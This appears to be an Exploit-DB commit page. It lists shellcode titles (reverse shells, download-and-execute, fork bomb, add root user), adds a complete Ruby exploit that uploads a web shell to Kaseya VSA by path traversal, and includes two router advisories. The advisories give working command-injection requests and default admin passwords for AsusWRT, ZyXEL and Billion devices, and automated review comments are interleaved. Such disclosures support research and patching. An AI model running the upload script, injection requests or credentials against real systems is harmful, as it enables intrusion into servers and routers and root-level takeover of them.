Linux/x64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x64 - sethostname(Rooted !) + killall Shellcode (33 bytes)

Windows/x86-64 - WinExec(cmd.exe) Shellcode (93 bytes)
Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes)
Windows/x64 - WinExec(cmd.exe) Shellcode (93 bytes)
Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)
Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)
Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)
Windows/x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)
Linux/x64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)
Windows/x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)
Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)
Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Linux/x86-64 - mkdir() Shellcode (25 bytes)
Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes)
Windows/x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)
Windows/x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Linux/x64 - mkdir() Shellcode (25 bytes)
Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (22 bytes)

Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)

Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)
Linux/x64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)
Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)
Linux/x64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)
Linux/x64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)
Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)
Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)
Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)
Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)
Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)
Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)
Linux/x64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)
Linux/x64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)
FreeBSD/x86-64 - execve(/bin/sh) Shellcode (28 bytes)
FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)
FreeBSD/x64 - execve(/bin/sh) Shellcode (28 bytes)
FreeBSD/x64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)
Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)
Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)
Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)
Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)
Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)
Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)
Linux/x86-64 - shutdown -h now Shellcode (65 bytes)
Linux/x86-64 - shutdown -h now Shellcode (64 bytes)
Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)
Linux/x64 - Execute /bin/sh Shellcode (27 bytes)
Linux/x64 - Execute /bin/sh Shellcode (24 bytes)
Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)
Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)
Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)
Linux/x64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)
Linux/x64 - shutdown -h now Shellcode (65 bytes)
Linux/x64 - shutdown -h now Shellcode (64 bytes)
Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)
Linux/x64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)

Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)
Windows/x86-64 (10) - Egghunter Shellcode (45 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2)
Windows/x64 (10) - Egghunter Shellcode (45 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (2)
Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)
Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1)
Linux/x64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)
Windows - cmd.exe Shellcode (718 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (1)

Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (24 bytes)

Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)
Linux/x64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)
Linux/x86-64 - Kill All Processes Shellcode (19 bytes)
Linux/x86-64 - Fork Bomb Shellcode (11 bytes)
Linux/x64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)
Linux/x64 - Kill All Processes Shellcode (19 bytes)
Linux/x64 - Fork Bomb Shellcode (11 bytes)

Linux/x86-64 - mkdir(evil) Shellcode (30 bytes)
Linux/x64 - mkdir(evil) Shellcode (30 bytes)

Windows/x86-64 - API Hooking Shellcode (117 bytes)
Windows/x64 - API Hooking Shellcode (117 bytes)
Offensive Security 2018-01-25 18:22:06 +00:00
parent de7fa7a242
commit cf96346519
56 changed files with 2410 additions and 254 deletions

165
exploits/asp/webapps/43882.rb Executable file

@ -0,0 +1,165 @@
#!/usr/bin/ruby
#
# kazPwn.rb - Kaseya VSA v7 to v9.1 authenticated arbitrary file upload (CVE-2015-6589 / ZDI-15-450)
# ===================
# by Pedro Ribeiro <pedrib@gmail.com> / Agile Information Security
# Disclosure date: 28/09/2015
#
# Usage: ./kazPwn.rb http[s]://<host>[:port] <username> <password> <shell.asp>
#
# execjs and mechanize gems are required to run this exploit
#
# According to Kaseya's advisory, this exploit should work for the following VSA versions:
# VSA Version 7.0.0.0 7.0.0.32
# VSA Version 8.0.0.0 8.0.0.22
# VSA Version 9.0.0.0 9.0.0.18
# VSA Version 9.1.0.0 9.1.0.8
# This exploit has been tested with v8 and v9.
#
# Check out these two companion vulnerabilities, both of which have Metasploit modules:
# - Unauthenticated remote code execution (CVE-2015-6922 / ZDI-15-449)
# - Unauthenticated remote privilege escalation (CVE-2015-6922 / ZDI-15-448)
#
# This code is released under the GNU General Public License v3
# http://www.gnu.org/licenses/gpl-3.0.html
#
require 'execjs'
require 'mechanize'
require 'open-uri'
require 'uri'
require 'openssl'
# avoid certificate errors
OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE
I_KNOW_THAT_OPENSSL_VERIFY_PEER_EQUALS_VERIFY_NONE_IS_WRONG = nil
# Fixes a Mechanize bug, see
# http://scottwb.com/blog/2013/11/09/defeating-the-infamous-mechanize-too-many-connection-resets-bug/
class Mechanize::HTTP::Agent
MAX_RESET_RETRIES = 10
# We need to replace the core Mechanize HTTP method:
#
# Mechanize::HTTP::Agent#fetch
#
# with a wrapper that handles the infamous "too many connection resets"
# Mechanize bug that is described here:
#
# https://github.com/sparklemotion/mechanize/issues/123
#
# The wrapper shuts down the persistent HTTP connection when it fails with
# this error, and simply tries again. In practice, this only ever needs to
# be retried once, but I am going to let it retry a few times
# (MAX_RESET_RETRIES), just in case.
#
def fetch_with_retry(
uri,
method = :get,
headers = {},
params = [],
referer = current_page,
redirects = 0
)
action = "#{method.to_s.upcase} #{uri.to_s}"
retry_count = 0
begin
fetch_without_retry(uri, method, headers, params, referer, redirects)
rescue Net::HTTP::Persistent::Error => e
# Pass on any other type of error.
raise unless e.message =~ /too many connection resets/
# Pass on the error if we've tried too many times.
if retry_count >= MAX_RESET_RETRIES
puts "**** WARN: Mechanize retried connection reset #{MAX_RESET_RETRIES} times and never succeeded: #{action}"
raise
end
# Otherwise, shutdown the persistent HTTP connection and try again.
# puts "**** WARN: Mechanize retrying connection reset error: #{action}"
retry_count += 1
self.http.shutdown
retry
end
end
# Alias so #fetch actually uses our new #fetch_with_retry to wrap the
# old one aliased as #fetch_without_retry.
alias_method :fetch_without_retry, :fetch
alias_method :fetch, :fetch_with_retry
end
if ARGV.length < 4
puts 'Usage: ./kazPwn.rb http[s]://<host>[:port] <username> <password> <shell.asp>'
exit -1
end
host = ARGV[0]
username = ARGV[1]
password = ARGV[2]
shell_file = ARGV[3]
login_url = host + '/vsapres/web20/core/login.aspx'
agent = Mechanize.new
# 1- go to the login URL, get a session cookie and the challenge.
page = agent.get(login_url)
login_form = page.forms.first
challenge = login_form['loginFormControl$ChallengeValueField']
# 2- calculate the password hashes with the challenge
source = open(host + "/inc/sha256.js").read
source += open(host + "/inc/coverPass.js").read
source += open(host + "/inc/coverPass256.js").read
source += open(host + "/inc/coverData.js").read
source += open(host + "/inc/passwordHashes.js").read
source.gsub!(/\<\!--(\s)*\#include.*--\>/, "") # remove any includes, this causes execjs to fail
context = ExecJS.compile(source)
hashes = context.call("getHashes",username,password,challenge)
# 3- submit the login form, authenticate our cookie and get the ReferringWebWindowId needed to upload the file
# We need the following input values to login:
# - __EVENTTARGET (empty)
# - __EVENTARGUMENT (empty)
# - __VIEWSTATE (copied from the original GET request)
# - __VIEWSTATEENCRYPTED (copied from the original GET request; typically empty)
# - __EVENTVALIDATION (copied from the original GET request)
# - loginFormControl$UsernameTextbox (username)
# - loginFormControl$PasswordTextbox (empty)
# - loginFormControl$SubmitButton (copied from the original GET request; typically "Logon")
# - loginFormControl$SHA1Field (output from getHashes)
# - loginFormControl$RawSHA1Field (output from getHashes)
# - loginFormControl$SHA256Field (output from getHashes)
# - loginFormControl$RawSHA256Field (output from getHashes)
# - loginFormControl$ChallengeValueField (copied from the original GET request)
# - loginFormControl$TimezoneOffset ("0")
# - loginFormControl$ScreenHeight (any value between 800 - 2048)
# - loginFormControl$ScreenWidth (any value between 800 - 2048)
login_form['__EVENTTARGET'] = ''
login_form['__EVENTARGUMENT'] = ''
login_form['loginFormControl$UsernameTextbox'] = username
login_form['loginFormControl$SHA1Field'] = hashes['SHA1Hash']
login_form['loginFormControl$RawSHA1Field'] = hashes['RawSHA1Hash']
login_form['loginFormControl$SHA256Field'] = hashes['SHA256Hash']
login_form['loginFormControl$RawSHA256Field'] = hashes['RawSHA256Hash']
login_form['loginFormControl$TimezoneOffset'] = 0
login_form['loginFormControl$SubmitButton'] = 'Logon'
login_form['loginFormControl$screenHeight'] = rand(800..2048)
login_form['loginFormControl$screenWidth'] = rand(800..2048)
page = agent.submit(login_form)
web_windowId = Hash[URI::decode_www_form(page.uri.query)]['ReferringWebWindowId']
# 4- upload the file using the ReferringWebWindowId
page = agent.post('/vsapres/web20/json.ashx',
'directory' => "../WebPages",
'ReferringWebWindowId' => web_windowId,
'request' => 'uploadFile',
'impinf__uploadfilelocation' => File.open(shell_file)
)
if page.code == "200"
puts "Shell uploaded, check " + host + "/" + File.basename(shell_file)
else
puts "Error occurred, shell was not uploaded correctly..."
end
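Review bot: Step 2 downloads five JavaScript files from the target (`source = open(host + "/inc/sha256.js").read` and the four lines after it) and passes them to `ExecJS.compile(source)`, so whatever the server returns runs in the operator's local JavaScript runtime, and ExecJS is not a security sandbox. The header comment should say so and recommend running the script from a disposable VM, or the hash routine should be reimplemented in Ruby. Two related points: those calls use `Kernel#open` on a string built from `ARGV[0]`, where `URI.parse(...).read` would treat the argument strictly as a URL, and the reassignment `OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE` disables certificate verification for every TLS connection in the process, where `agent.verify_mode = OpenSSL::SSL::VERIFY_NONE` would scope it to the Mechanize agent. The header also gives CVE-2015-6922 for both companion issues (ZDI-15-449 and ZDI-15-448), which is worth confirming.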


@ -1,12 +1,10 @@
#
# Source: https://github.com/pedrib/PoC/blob/2133bc3c0864c332bff7ce1000c83311316ac8ff/exploits/netgearPwn.rb
#
# Remote code execution in NETGEAR WNR2000v5
# - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security
# Released on 20/12/2016
#
# NOTE: this exploit is "alpha" quality, however the bof method should work fine both with or without reboot.
# A more reliable Metasploit module will be released soon.
# NOTE: this exploit is "alpha" quality and has been deprecated. Please see the modules
# accepted into the Metasploit framework, or https://github.com/pedrib/PoC/tree/master/exploits/metasploit/wnr2000
#
#
# TODO:
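Review bot: The deprecation NOTE in the header points readers to "the modules accepted into the Metasploit framework" without naming them and links to `tree/master`, a moving ref, while the `# Source:` line in the same header is pinned to a commit hash. Name the module path or pin the link to a commit so the pointer from a deprecated script to its replacement stays resolvable.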

File diff suppressed because one or more lines are too long


@ -0,0 +1,134 @@
>> Unauthenticated LAN remote code execution in AsusWRT
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 22/01/2018 / Last updated: 25/01/2018
>> Background and summary
AsusWRT is the operating system used in mid range and high end Asus routers. It is based on Linux, but with a sleek web UI and a slimmed down profile suitable for running on resource constrained routers.
Thankfully ASUS is a responsible company, and not only they publish the full source code as required by the GPL, but they also give users full root access to their router via SSH. Overall the security of their operating system is pretty good, especially when compared to other router manufacturers.
However due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user.
A special thanks to Beyond Security SecuriTeam Secure Disclosure (SSD) programme for disclosing these vulnerabilities to the manufacturer, speeding the resolution of the issues discovered (see [1] for their advisory).
>> Technical details:
#1
Vulnerability: HTTP server authentication bypass
CVE-2018-5999
Attack Vector: Remote
Constraints: None; exploitable by an unauthenticated attacker
Affected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007
The AsusWRT HTTP server has a flaw in handle_request() that allows an unauthenticated user to perform a POST request for certain actions.
In AsusWRT_source/router/httpd/httpd.c:
handle_request(void)
{
...
handler->auth(auth_userid, auth_passwd, auth_realm);
auth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp);
if (auth_result != 0) <--- auth fails
{
if(strcasecmp(method, "post") == 0){
if (handler->input) {
handler->input(file, conn_fp, cl, boundary); <--- but POST request is still processed
}
send_login_page(fromapp, auth_result, NULL, NULL, 0);
}
//if(!fromapp) http_logout(login_ip_tmp, cookies);
return;
}
...
}
This can (and will) be combined with other vulnerabilities to achieve remote code execution.
#2
Vulnerability: Unauthorised configuration change (NVRAM value setting)
CVE-2018-6000
Attack Vector: Remote
Constraints: None; exploitable by an unauthenticated attacker
Affected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007
By abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability that allows an attacker to set NVRAM configuration values directly from the request.
In AsusWRT_source/router/httpd/web.c:
do_vpnupload_post(char *url, FILE *stream, int len, char *boundary)
{
...
if (!strncasecmp(post_buf, "Content-Disposition:", 20)) {
if(strstr(post_buf, "name=\"file\""))
break;
else if(strstr(post_buf, "name=\"")) {
offset = strlen(post_buf);
fgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);
len -= strlen(post_buf) - offset;
offset = strlen(post_buf);
fgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);
len -= strlen(post_buf) - offset;
p = post_buf;
name = strstr(p, "\"") + 1;
p = strstr(name, "\"");
strcpy(p++, "\0");
value = strstr(p, "\r\n\r\n") + 4;
p = strstr(value, "\r");
strcpy(p, "\0");
//printf("%s=%s\n", name, value);
nvram_set(name, value);
}
}
...
}
These NVRAM values contain very important configuration variables, such as the admin password, which can be set in this way by an authenticated or unauthenticated attacker.
Once that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH.
A more elegant option is to abuse infosvr, which is a UDP daemon running on port 9999.
The daemon has a special mode where it executes a command received in a packet as the root user. This special mode is only enabled if ateCommand_flag is set to 1, which most likely only happens during factory testing or QA (it was not enabled by default in the firmware distributed by Asus in their website).
However we can set ateCommand_flag to 1 using the VPN configuration upload technique described above and then send a PKT_SYSCMD to infosvr. The daemon will read a command from the packet and execute it as root, achieving our command execution cleanly - without changing any passwords.
(Note: infosvr used to allow unauthenticated command execution without the ateCommand_flag being set, which led to Joshua Drake's (jduck) discovery of CVE-2014-9583, see [2]; this was fixed by Asus in early 2015).
Packet structure (from AsusWRT_source/router/shared/iboxcom.h):
- Header
typedef struct iboxPKTEx
{
BYTE ServiceID;
BYTE PacketType;
WORD OpCode;
DWORD Info; // Or Transaction ID
BYTE MacAddress[6];
BYTE Password[32]; //NULL terminated string, string length:1~31, cannot be NULL string
} ibox_comm_pkt_hdr_ex;
- Body
typedef struct iboxPKTCmd
{
WORD len;
BYTE cmd[420]; <--- command goes here
} PKT_SYSCMD; // total 422 bytes
A Metasploit module exploiting this vulnerability has been released [3].
>> Fix:
Upgrade to AsusWRT v3.0.0.4.384.10007 or above.
See [4] for the very few details and new firmware released by Asus.
>> References:
[1] https://blogs.securiteam.com/index.php/archives/3589
[2] https://github.com/jduck/asus-cmd
[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/asuswrt_lan_rce.rb
[4] https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
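Review bot: The ">> Fix:" section gives only a firmware version, so a reader cannot tell from the advisory what to verify in the published source. Consider adding one line per issue: for #1, that `handler->input(file, conn_fp, cl, boundary)` must not run inside the `auth_result != 0` branch of handle_request(); for #2, that do_vpnupload_post() should not pass arbitrary `name=` fields to `nvram_set(name, value)`. A short interim note for devices that cannot be upgraded, such as restricting which LAN hosts can reach the HTTP server and UDP port 9999, would also help.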


@ -0,0 +1,180 @@
>> Multiple vulnerabilities in TrueOnline / ZyXEL / Billion routers
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 26/12/2016 / Last updated: 18/01/2017
>> Summary:
TrueOnline is a major Internet Service Provider in Thailand which distributes various rebranded ZyXEL and Billion routers to its customers.
Three router models - ZyXEL P660HN-T1A v1, ZyXEL P660HN-T1A v2 and Billion 5200W-T - contain a number of default administrative accounts, as well as authenticated and unauthenticated command injection vulnerabilities (running as root) in their web interfaces, mostly in the syslog remote forwarding function. All the routers are still in widespread use in Thailand, with the Billion 5200W-T router currently being distributed to new customers.
These routers are based on the TC3162U SoC (or variants of it), a system-on-a-chip made by TrendChip, which was a manufacturer of SoC that was acquired by Ralink / MediaTek in 2011.
TC3162U based routers have two firmware variants.
The first variant is "ras", used on hardware versions that have 4mb or less of flash storage, which is based on the real time operating system ZynOS. It is infamous as the includes Allegro RomPager v4.07, which is vulnerable to the "misfortune cookie" attack (see [1]), and its web server is vulnerable to the "rom-0" attack (see [2]).
The other variant is "tclinux", which is a full fledged Linux used in hardware versions that have more than 4 MB of flash storage. This advisory refers to this variant, which includes the Boa web server and several ASP files with the command injection vulnerabilities. Note that tclinux might also be vulnerable to the misfortune cookie and rom-0 attacks - this was not investigated in detail by the author. For more information on tclinux see [3].
It should be noted that tclinux contains files and configuration settings in other languages (for example in Turkish). Therefore it is likely that these firmware versions are not specific to TrueOnline, and other ISP customised routers in other countries might also be vulnerable. It is also possible that other brands and router models that use the tclinux variant are also affected by the command injection vulnerabilities (while the default accounts are likely to be TrueOnline specific). Please contact pedrib@gmail.com if you find any other routers or firmware versions that have the same vulnerabilities.
These vulnerabilities were discovered in July 2016 and reported through Securiteam's Secure Disclosure program (see https://blogs.securiteam.com/index.php/archives/2910 for their advisory). SSD contacted the vendors involved, but received no reply and posted their advisory on December 26th 2016. There is currently no fix for these issues. It is unknown whether these issues are exploitable over the WAN, although this is a possibility since some of the default accounts appear to have been deployed for ISP use.
Three Metasploit modules that abuse these vulnerabilities have been released (see [4], [5] and [6]).
>> Update (18/01/2017):
ZyXEL have responded to this advisory and published information about upcoming fixes for the 660HN v1 and v2 in http://www.zyxel.com/support/announcement_unauthenticated.shtml
>> Technical details:
#1
Vulnerability: Unauthenticated command injection (ZyXEL P660HN-T1A v1)
NO-CVE - use FD:2017/Jan/40-1 (Full Disclosure) or SSD-2910 (SecuriTeam blog)
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker in the LAN. See below for other constraints.
Affected versions:
- ZyXEL P660HN-T1A, hardware revision v1, TrueOnline firmware version 340ULM0b31, other firmware versions might be affected
This router has a command injection vulnerability in the Maintenance > Logs > System Log > Remote System Log forwarding function.
The vulnerability is in the ViewLog.asp page, which is accessible unauthenticated. The following request will cause the router to issue 3 ping requests to 10.0.99.102:
POST /cgi-bin/ViewLog.asp HTTP/1.1
remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bping+-c+3+10.0.99.102%3b%23&remoteSubmit=Save
The command in injection is in the remote_host parameter.
This vulnerability was found during a black box assessment of the web interface, so the injection path was not fully investigated. All commands run as root.
#2
Vulnerability: Authenticated command injection (ZyXEL P660HN-T1A v2)
NO-CVE - use FD:2017/Jan/40-2 (Full Disclosure) or SSD-2910 (SecuriTeam blog)
Attack Vector: Remote
Constraints: Can be exploited by an authenticated attacker in the LAN. See below for other constraints.
Affected versions:
- ZyXEL P660HN-T1A, hardware revision v2, TrueOnline firmware version 200AAJS3D0, other firmware versions might be affected
Unlike in the P660HN-Tv1, the injection is authenticated and in the logSet.asp page. However, this router contains several default administrative accounts (see below) that can be used to exploit this vulnerability.
The injection is in the logSet.asp page that sets up remote forwarding of syslog logs, and the parameter vulnerable to command injection is the serverIP parameter.
The following request will cause the router to issue 3 ping requests to 1.1.1.1:
POST /cgi-bin/pages/maintenance/logSetting/logSet.asp HTTP/1.1
logSetting_H=1&active=1&logMode=LocalAndRemote&serverIP=192.168.1.1`ping -c 3 1.1.1.1`%26%23&serverPort=514
This vulnerability was found during a black box assessment of the web interface, so the injection path was not fully investigated. All commands run as root.
It is known that this injection ends up in /etc/syslog.conf as
ServerIP="192.168.1.1 `ping -c 3 1.1.1.1`&#"
Which will then be executed by a background process almost immediately.
The actual injection is limited to 28 characters. This can circunvented by writing a shell script file in the /tmp directory 28 characters at a time, and the executing that file.
#3
Vulnerability: Unauthenticated command injection (Billion 5200W-T)
NO-CVE - use FD:2017/Jan/40-3 (Full Disclosure) or SSD-2910 (SecuriTeam blog)
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker in the LAN. See below for other constraints.
Affected versions:
- Billion 5200W-T, TrueOnline firmware version 1.02b.rc5.dt49, other firmware versions might be affected
The Billion 5200W-T router contains an unauthenticated command injection in adv_remotelog.asp page, which is used to set up remote syslog forwarding.
The following request will cause the router to issue 3 ping requests to 192.168.1.35:
POST /cgi-bin/adv_remotelog.asp HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
RemotelogEnable=1&syslogServerAddr=1.1.1.1%3bping+-c+3+192.168.1.35%3b&serverPort=514
The injection is on the syslogServerAddr parameter and can be exploited by entering a valid IP address, followed by ";<COMMAND>;"
This vulnerability was found during a black box assessment of the web interface, so the injection path was not fully investigated. All commands run as root.
#4
Vulnerability: Authenticated command injection (Billion 5200W-T)
NO-CVE - use FD:2017/Jan/40-4 (Full Disclosure) or SSD-2910 (SecuriTeam blog)
Attack Vector: Remote
Constraints: Can be exploited by an authenticated attacker in the LAN. See below for other constraints.
Affected versions:
- Billion 5200W-T, TrueOnline firmware version TCLinux Fw $7.3.8.0 v008 130603, other firmware versions might be affected
The Billion 5200W-T router also has several other command injections in its interface, depending on the firmware version, such as an authenticated command injection in tools_time.asp (uiViewSNTPServer parameter).
It should be noted that this router contains several default administrative accounts that can be used to exploit this vulnerability.
This injection can be exploited with the following request:
POST /cgi-bin/tools_time.asp HTTP/1.1
Host: 192.168.1.1
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Cookie: SESSIONID=7c082c75
SaveTime=1&uiCurrentTime2=&uiCurrentTime1=&ToolsTimeSetFlag=0&uiRadioValue=0&uiClearPCSyncFlag=0&uiwPCdateMonth=0&uiwPCdateDay=&uiwPCdateYear=&uiwPCdateHour=&uiwPCdateMinute=&uiwPCdateSec=&uiCurTime=N%2FA+%28NTP+server+is+connecting%29&uiTimezoneType=0&uiViewSyncWith=0&uiPCdateMonth=1&uiPCdateDay=&uiPCdateYear=&uiPCdateHour=&uiPCdateMinute=&uiPCdateSec=&uiViewdateToolsTZ=GMT%2B07%3A00&uiViewdateDS=Disable&uiViewSNTPServer="%3b+ping+-c+20+192.168.0.1+%26%23&ntp2ServerFlag=N%2FA&ntp3ServerFlag=N%2FA
This writes the command to a file /etc/ntp.sh:
/userfs/bin/ntpclient -s -c 3 -l -h ""; ping -c 20 192.168.0.1 &#" &
which is then executed almost immediately.
This vulnerability was found during a black box assessment of the web interface, so the injection path was not fully investigated. All commands run as root.
#5
Vulnerability: Default administrative credentials (ZyXEL P660HN-T1A v1)
NO-CVE - use FD:2017/Jan/40-5 (Full Disclosure) or SSD-2910 (SecuriTeam blog)
Attack Vector: Remote
Constraints: N/A
Affected versions:
- ZyXEL P660HN-T1A, hardware revision v1, TrueOnline firmware version 340ULM0b31, other firmware versions might be affected
This router contains the following default administrative accounts:
username: admin; password: password
username: true; password: true
#6
Vulnerability: Default administrative credentials (ZyXEL P660HN-T1A v2)
NO-CVE - use FD:2017/Jan/40-6 (Full Disclosure) or SSD-2910 (SecuriTeam blog)
Attack Vector: Remote
Constraints: N/A
Affected versions:
- ZyXEL P660HN-T1A, hardware revision v2, TrueOnline firmware version 200AAJS3D0, other firmware versions might be affected
This router contains the following default administrative accounts:
username: admin; password: password
username: true; password: true
username: supervisor; password: zyad1234
#7
Vulnerability: Default administrative credentials (Billion 5200W-T)
NO-CVE - use FD:2017/Jan/40-7 (Full Disclosure) or SSD-2910 (SecuriTeam blog)
Attack Vector: Remote
Constraints: N/A
Affected versions:
- Billion 5200W-T, TrueOnline firmware version TCLinux Fw $7.3.8.0 v008 130603, other firmware versions might be affected
This router contains the following default administrative accounts:
username: admin; password: password
username: true; password: true
username: user3; password: 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678
>> Fix:
There is NO FIX for this vulnerability. Do not allow untrusted clients to connect to these routers. Timeline of disclosure:
July 2016: Vulnerability reported to Securiteam Secure Disclosure
Securiteam contacted the affected versions. No response.
26.12.2016: Vulnerability information published in the SSD blog (https://blogs.securiteam.com/index.php/archives/2910 for their advisory).
12.01.2017: Vulnerability information published in https://github.com/pedrib/PoC
18.01.2017: ZyXEL have responded to this advisory and published information about upcoming fixes for the 660HN v1 and v2 in http://www.zyxel.com/support/announcement_unauthenticated.shtml
>> References:
[1] http://www.kb.cert.org/vuls/id/561444
[2] https://k0st.wordpress.com/2015/07/05/identifying-and-exploiting-rom-0-vulnerabilities/
[3] https://vasvir.wordpress.com/tag/trendchip-firmware/
[4] https://github.com/rapid7/metasploit-framework/pull/7820
[5] https://github.com/rapid7/metasploit-framework/pull/7821
[6] https://github.com/rapid7/metasploit-framework/pull/7822
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
